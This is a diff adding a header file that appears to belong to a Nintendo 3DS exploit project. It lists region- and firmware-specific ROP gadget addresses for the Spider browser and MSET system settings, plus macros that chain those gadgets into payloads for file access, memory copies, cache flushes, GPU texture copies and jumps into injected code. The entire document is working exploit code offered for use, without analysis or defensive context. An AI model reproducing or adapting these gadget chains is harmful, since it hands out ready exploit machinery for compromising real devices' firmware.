+		#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC	0x00167540
+		#define IFile_Write_LDMFD_SP_R4_5_6_7_8_9_10_11_PC	0x001675C8
+		#define BLX_R5_LDMFD_SP_R4_5_6_7_8_PC	0x001B80B8
+		#define CALL_BX_LR			0x0023ECA0
+		#define CALL_BX_LR_2			0x001902B8
+		#define LDMFD_SP_R4_5_6_LR_BX_R12	0x002C4EB0
+		#define POP_LR_PC			0x012FE78
+		#define POP_R0_1_2_3_4_7_PC		0x0019349B
+		#define POP_R1_PC			0x0022728C
+		#define POP_R2_3_PC			0x0014C8F4
+		#define SP_LR_LDMFD_SP_LR_PC		0x0012FE74
+		#define MAGIC				0x0012FE60
+	#elif defined(SPIDER_9X_KR) //1.7567.KR
+		#define	HANDLE_PTR			0x003DA70C
+		#define GSPGPU_FlushDataCache_LDMFD_SP_R4_5_6_PC	0x0012BCD4
+		#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue_LDMFD_SP_R4_5_6_7_8_9_10_PC	0x0012B9F8
+		#define MEMCPY_LDMFD_SP_R4_5_6_7_8_9_10_LR	0x002407D4
+		#define SVC_0A_BX_LR			0x001041F8
+		#define FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC	0x0019CA80
+		#define IFile_Open_LDMFD_SP_R4_5_6_7_8_PC	0x0022FA8C
+		#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC	0x00168718
+		#define IFile_Write_LDMFD_SP_R4_5_6_7_8_9_10_11_PC	0x001687A0
+		#define BLX_R5_LDMFD_SP_R4_5_6_7_8_PC	0x001B9358
+		#define CALL_BX_LR			0x0023FC6C
+		#define CALL_BX_LR_2			0x00191554
+		#define LDMFD_SP_R4_5_6_LR_BX_R12	0x002C5760
+		#define POP_LR_PC			0x0012FE4C
+		#define POP_R0_1_2_3_4_7_PC		0x0019473B
+		#define POP_R1_PC			0x0022825C
+		#define POP_R2_3_PC			0x0014D4E0
+		#define SP_LR_LDMFD_SP_LR_PC		0x0012FE48
+		#define MAGIC				0x0012FE34
+	#elif defined(SPIDER_9X_TW) //1.7567.TW
+		#define	HANDLE_PTR			0x003DA70C
+		#define GSPGPU_FlushDataCache_LDMFD_SP_R4_5_6_PC	0x0012BD00
+		#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue_LDMFD_SP_R4_5_6_7_8_9_10_PC	0x0012BA24
+		#define MEMCPY_LDMFD_SP_R4_5_6_7_8_9_10_LR	0x00240868
+		#define SVC_0A_BX_LR			0x001041F8
+		#define FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC	0x0019CAC8
+		#define IFile_Open_LDMFD_SP_R4_5_6_7_8_PC	0x0022FB20
+		#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC	0x00168760
+		#define IFile_Write_LDMFD_SP_R4_5_6_7_8_9_10_11_PC	0x001687E8
+		#define BLX_R5_LDMFD_SP_R4_5_6_7_8_PC	0x001B93A0
+		#define CALL_BX_LR			0x0023FD00
+		#define CALL_BX_LR_2			0x0019159C
+		#define LDMFD_SP_R4_5_6_LR_BX_R12	0x002C57F8
+		#define POP_LR_PC			0x0012FE78
+		#define POP_R0_1_2_3_4_7_PC		0x00194783
+		#define POP_R1_PC			0x002282D8
+		#define POP_R2_3_PC			0x0014D4E8
+		#define SP_LR_LDMFD_SP_LR_PC		0x0012FE74
+		#define MAGIC				0x0012FE60
+	#else //1.7567.JP/US/EU
+		#define DLPLAY_CODE_LOC			(DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000)
+		#define DLPLAY_HOOK_LOC			(0x03FF3500+0x14000000)
+		#define	HANDLE_PTR			0x003DA72C
+		#define GSPGPU_FlushDataCache_LDMFD_SP_R4_5_6_PC	0x0012C1E0
+		#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue_LDMFD_SP_R4_5_6_7_8_9_10_PC	0x0012BF04
+		#define BLX_R5_LDMFD_SP_R4_5_6_7_8_PC	0x001B9308
+		#define CALL_BX_LR			0x0023FFE8
+		#define CALL_BX_LR_2			0x00191504
+		#define LDMFD_SP_R4_5_6_LR_BX_R12	0x002C5AE0
+		#define POP_LR_PC			0x0013035C
+		#define POP_R0_1_2_3_4_PC		0x0010B5B4
+		#define POP_R0_1_2_3_4_7_PC		0x001946EB
+		#define POP_R1_PC			0x00228AF4
+		#define POP_R2_3_PC			0x0014D598
+		#define POP_R2_3_4_PC			0x001007B4
+		#define POP_R4_PC			0x001050F0
+		#define SP_LR_LDMFD_SP_LR_PC		0x00130358
+		#define SVC_0A_BX_LR			0x001041F8
+		#define FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC	0x0019CA30
+		#define IFile_Open_LDMFD_SP_R4_5_6_7_8_PC	0x0022FE08
+		#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC	0x001686DC
+		#define IFile_Write_LDMFD_SP_R4_5_6_7_8_9_10_11_PC	0x00168764
+		#define MEMCPY_LDMFD_SP_R4_5_6_7_8_9_10_LR	0x00240B50
+		#define MAGIC				0x00130344
+		#define ROP_LOC				0x08B88400
+//		#define ROP_LOC				0x08CF2000
+	#endif
+#else
+	#error ROP version not defined
+#endif
+#if defined(MSET_4X) || defined(MSET_4X_DG) || defined(MSET_6X)
+	#define CODE_ENTRY			0x00240000
+	#define BUFFER_LOC			0x14700000
+	#define rop_fs_mount(drive)		.word POP_R0_PC, drive, FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC + 4, GARBAGE, GARBAGE, GARBAGE
+	#define rop_file_open(handle, filename, mode)	.word POP_R0_PC, handle, POP_R1_2_3_PC, ROP_LOC+filename, mode, GARBAGE, IFile_Open + 4, GARBAGE, GARBAGE, GARBAGE, GARBAGE, POP_PC
+	#define rop_flush_data_cache(buffer, size) .word POP_R0_PC, HANDLE_PTR, POP_R1_2_3_PC, KPROCESS_HANDLE, buffer, size, GSPGPU_FlushDataCache_LDMFD_SP_R4_5_6_PC + 4, GARBAGE, GARBAGE, GARBAGE
+	#if defined(MSET_6X)
+		#define THIS				0x00287000
+		#define rop_file_read(handle, readcount, buffer, size) .word POP_R0_PC, handle, POP_R1_2_3_PC, readcount, buffer, size, IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC + 4, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE
+		#define rop_file_write(handle, writecount, buffer, size) .word POP_R1_2_3_PC, GARBAGE, POP_PC, GARBAGE, POP_R4_LR_BX_R2, GARBAGE, POP_PC, POP_R0_PC, handle, POP_R1_2_3_PC, writecount, buffer, size, IFile_Write_LDMFD_SP_R4_5_6_7_8_9_10_11_PC
+		#define rop_memcpy(dst, src, size) .word POP_R0_PC, dst, POP_R1_2_3_PC, src, size, GARBAGE, MEMCPY_LDMFD_SP_R4_5_6_7_8_9_10_LR + 4, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE
+		#define rop_sleep(ns) .word POP_R0_PC, ns, POP_R1_2_3_PC, 0, POP_PC, GARBAGE, POP_R4_LR_BX_R2, GARBAGE, POP_PC, SVC_0A_BX_LR 
+	#else
+		#define THIS				0x00279000
+		#define rop_file_read(handle, readcount, buffer, size) .word POP_R0_R2_PC, handle, POP_PC, POP_R4_LR_BX_R2, GARBAGE, POP_PC, POP_R1_2_3_PC, readcount, buffer, size, IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC
+		#define rop_file_write(handle, writecount, buffer, size) .word POP_R0_R2_PC, handle, POP_PC, POP_R4_LR_BX_R2, GARBAGE, POP_PC, POP_R1_2_3_PC, writecount, buffer, size, IFile_Write_LDMFD_SP_R4_5_6_7_8_9_10_11_PC
+		#define rop_memcpy(dst, src, size) .word POP_R0_R2_PC, dst, POP_PC, POP_R4_LR_BX_R2, GARBAGE, POP_PC, POP_R1_2_3_PC, src, size, GARBAGE, MEMCPY_LDMFD_SP_R4_5_6_7_8_9_10_LR
+		#define rop_sleep(ns) .word POP_R0_R2_PC, ns, POP_PC, POP_R4_LR_BX_R2, GARBAGE, POP_PC, POP_R1_PC, 0, SVC_0A_BX_LR 
+	#endif
+#else //Spider
+	#define CODE_ENTRY			0x009D2000
+	#define THIS				0x0978CC00
+	#ifndef CODE_TARGET
+		#define CODE_TARGET			0x19592000
+	#endif
+	//#define THIS				0x08F10000
+	#ifndef ROP_LOC
+		#if (defined(SPIDER_42_CN) || defined(SPIDER_45_CN) || defined(SPIDER_5X_CN) || defined(SPIDER_9X_CN))
+			#define ROP_LOC				0x08CC0000
+		#else
+			#define ROP_LOC				0x08CD0000
+		#endif
+	#endif
+	#define BUFFER_LOC			0x18410000
+	#define rop_flush_data_cache(buffer, size) .word POP_LR_PC, POP_PC, POP_R0_PC, HANDLE_PTR, POP_R1_2_3_PC, KPROCESS_HANDLE, buffer, size, GSPGPU_FlushDataCache_LDMFD_SP_R4_5_6_PC
+	#define rop_fs_mount(drive)		.word POP_LR_PC, POP_PC, POP_R0_PC, drive, FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC
+	#define rop_sleep(ns)			.word POP_LR_PC, POP_PC, POP_R0_PC, ns, POP_R1_PC, 0, SVC_0A_BX_LR
+	#define rop_memcpy(dst, src, size)	.word POP_LR_PC, POP_PC, POP_R0_PC, dst, POP_R1_2_3_PC, src, size, GARBAGE, MEMCPY_LDMFD_SP_R4_5_6_7_8_9_10_LR
+	#define rop_file_read(handle, readcount, buffer, size)	.word POP_LR_PC, POP_PC, POP_R0_PC, handle, POP_R1_2_3_PC, readcount, buffer, size, IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC
+	#define rop_file_write(handle, writecount, buffer, size)	.word POP_LR_PC, POP_PC, POP_R0_PC, handle, POP_R1_2_3_PC, writecount, buffer, size, IFile_Write_LDMFD_SP_R4_5_6_7_8_9_10_11_PC
+	#if defined(SPIDER_4X)
+		#define rop_file_open(handle, filename, mode)	.word POP_LR_PC, POP_PC, POP_R0_PC, handle, POP_R1_2_3_PC, ROP_LOC+filename, mode, GARBAGE, IFile_Open_LDMFD_SP_R4_5_6_7_PC
+	#else
+		#define rop_file_open(handle, filename, mode)	.word POP_LR_PC, POP_PC, POP_R0_PC, handle, POP_R1_2_3_PC, ROP_LOC+filename, mode, GARBAGE, IFile_Open_LDMFD_SP_R4_5_6_7_8_PC
+	#endif
+#endif
+#define JOIN(a,b)	a##b
+#define LABEL(a)	JOIN(loc_, a)
+#define LINE_LABEL	LABEL(__LINE__)
+#if defined(SPIDER_4X)
+	#define rop_gx_texture_copy(src, dst, size)	LINE_LABEL:	.word POP_R0_PC, nn__gxlow__CTR__detail__GetInterruptReceiver+0x58, POP_R1_PC, ROP_LOC+LINE_LABEL+0x14, nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue_LDMFD_SP_R4_5_6_7_8_PC + 4, GX_SetTextureCopy, src, dst, (size+0xF)&~0xF, 0xFFFFFFFF, POP_R0_PC, 0x00000008
+#else
+	#define rop_gx_texture_copy(src, dst, size)	LINE_LABEL:	.word POP_R0_PC, nn__gxlow__CTR__detail__GetInterruptReceiver+0x58, POP_R1_PC, ROP_LOC+LINE_LABEL+0x14, nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue_LDMFD_SP_R4_5_6_7_8_9_10_PC + 4, GX_SetTextureCopy, src, dst, (size+0xF)&~0xF, 0xFFFFFFFF, 0xFFFFFFFF, 0x00000008
+#endif
+#define rop_jump(address)		.word POP_R4_5_6_7_8_9_10_11_12_PC, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE, GARBAGE, POP_PC, LDMFD_SP_R4_5_6_LR_BX_R12, GARBAGE, GARBAGE, GARBAGE, address-4, SP_LR_LDMFD_SP_LR_PC
+#define rop_jump_arm			.word CODE_ENTRY
+#define rop_store(addr, val)		.word POP_R0_PC, addr, POP_R1_PC, val, STR_R1_0_POP_R4_PC, GARBAGE